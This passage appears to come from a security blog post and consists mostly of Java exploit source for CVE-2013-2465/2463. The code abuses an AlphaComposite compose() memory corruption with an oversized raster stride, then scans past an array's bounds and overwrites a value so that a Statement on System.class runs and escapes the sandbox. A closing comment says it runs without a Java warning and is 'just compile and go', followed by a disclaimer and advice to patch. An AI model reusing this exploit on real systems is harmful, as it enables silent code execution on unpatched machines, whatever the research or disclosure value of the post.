      arrayOfObject2[4] = ((Statement)arrayOfObject2[2]).getTarget();
      // Length before the image operation (8); compared again afterwards.
      int i = arrayOfInt.length;
      // Source raster: 8 bytes, every element set to -1.
      DataBufferByte localDataBufferByte2 = new DataBufferByte(8);
      for (int j = 0; j < 8; j++)
        localDataBufferByte2.setElem(j, -1);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel1 = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 0);
      WritableRaster localWritableRaster1 = Raster.createWritableRaster(
            localMultiPixelPackedSampleModel1, localDataBufferByte2, null);
      // Destination layout: the scanline stride (1073741789, or 16 less on 64-bit)
      // is far larger than the 9-byte buffer it describes.
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel2 = 
            new MultiPixelPackedSampleModel(0, 4, 2, 1, 
            1073741789 - (this._is64 ? 16 : 0), 288 + (this._is64 ? 128 : 0));
      WritableRaster localWritableRaster2 = Raster.createWritableRaster(
            localMultiPixelPackedSampleModel2, localDataBufferByte1, null);
      // 1-bit, two-entry indexed colour model used for both source and destination.
      byte[] arrayOfByte = { 0, -1 };
      IndexColorModel localIndexColorModel = new IndexColorModel(1, 2, 
            arrayOfByte, arrayOfByte, arrayOfByte);
      CompositeContext localCompositeContext = 
            AlphaComposite.Src.createContext(
            localIndexColorModel, localIndexColorModel, null);
      // The compose() call is the operation this CVE concerns.
      localCompositeContext.compose(localWritableRaster1, 
            localWritableRaster2, localWritableRaster2);
      int k = arrayOfInt.length;
      // Unchanged length means no corruption happened; the method stops here.
      if (k == i)
        return 1;
      int m = 0;
      int n = arrayOfObject2.length;
      // From here on arrayOfInt is indexed past its declared 8 elements.
      // NOTE(review): the zero/non-zero pattern mirrors arrayOfObject2 (length 7,
      // slots 2-4 set, the rest null); what exactly is overwritten is inferred
      // from the indices, not confirmed here.
      for (int i1 = i + 2; i1 < i + 32; i1++)
        if ((arrayOfInt[(i1 - 1)] == n) 
            && (arrayOfInt[i1] == 0) 
            && (arrayOfInt[(i1 + 1)] == 0) 
            && (arrayOfInt[(i1 + 2)] != 0) 
            && (arrayOfInt[(i1 + 3)] != 0) 
            && (arrayOfInt[(i1 + 4)] != 0) 
            && (arrayOfInt[(i1 + 5)] == 0) 
            && (arrayOfInt[(i1 + 6)] == 0))
        {
          int i2 = arrayOfInt[(i1 + 4)];
          for (int i3 = i1 + 7; i3 < i1 + 7 + 64; i3++)
            if (arrayOfInt[i3] == i2)
            {
              arrayOfInt[(i3 - 1)] = arrayOfInt[(i1 + 3)];
              m = 1;
              break;
            }
          if (m != 0)
            break;
        }
      // Only executed when the overwrite above took place.
      if (m != 0)
        try
        {
          ((Statement)arrayOfObject2[2]).execute();
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
      // Deliberately silent: any failure just leads to the next attempt in init().
    }
    return 0;
  }

  // Returns System.class, the target of the Statement built in attempt().
  public static Class getSystemClass()
  {
    return System.class;
  }
}

The behavior of CVE-2013-2463 appears to be the same as CVE-2013-2465. Neither triggers a click-to-run Java warning; they both just run, exploit, and pop up calc.exe with no problems.

In any case, some fairly simple source code for these exploits is above, and no special byte code alterations are needed like last time, just compile and go.

As always, again:

Note: Remember to only use this on machines you’re authorized to exploit, anything else is illegal!

And if you run Java… just uninstall or at least patch…
